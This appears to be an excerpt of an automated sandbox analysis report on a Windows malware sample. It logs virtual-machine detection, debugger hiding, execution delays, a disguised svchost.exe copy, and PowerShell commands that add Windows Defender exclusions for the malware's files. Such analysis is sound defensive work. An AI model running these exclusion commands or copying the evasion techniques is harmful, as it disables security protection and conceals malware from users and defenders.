            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\qINcOlwRud.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\qINcOlwRud.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Tries to delay execution (extensive OutputDebugStringW loop)
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe Section loaded: OutputDebugStringW count: 230
            Source: C:\Users\user\Desktop\qINcOlwRud.exe Section loaded: OutputDebugStringW count: 115
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\qINcOlwRud.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1725
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2432
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 625
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 804
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1052
            Source: C:\Users\user\Desktop\qINcOlwRud.exe Window / User API: threadDelayed 1181
            Source: C:\Users\user\Desktop\qINcOlwRud.exe Window / User API: threadDelayed 8628
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 5440 Thread sleep count: 100 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128 Thread sleep count: 804 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6116 Thread sleep count: 57 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1708 Thread sleep count: 1052 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 6564 Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 6572 Thread sleep count: 1181 > 30
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 6572 Thread sleep count: 8628 > 30
            Source: C:\Windows\System32\svchost.exe TID: 5856 Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe TID: 5068 Thread sleep count: 99 > 30
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe TID: 6100 Thread sleep count: 100 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548 Thread sleep count: 113 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548 Thread sleep count: 52 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6604 Thread sleep count: 153 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608 Thread sleep count: 92 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1948 Thread sleep count: 49 > 30
            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\qINcOlwRud.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Thread delayed: delay time: 922337203685477
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: qINcOlwRud.exe, 00000000.00000002.269348936.00000000011EF000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process information queried: ProcessInformation

            Anti Debugging:

            Hides threads from debuggers
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Thread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process queried: DebugPort
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Users\user\Desktop\qINcOlwRud.exe C:\Users\user\Desktop\qINcOlwRud.exe
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Queries volume information: C:\Users\user\Desktop\qINcOlwRud.exe VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
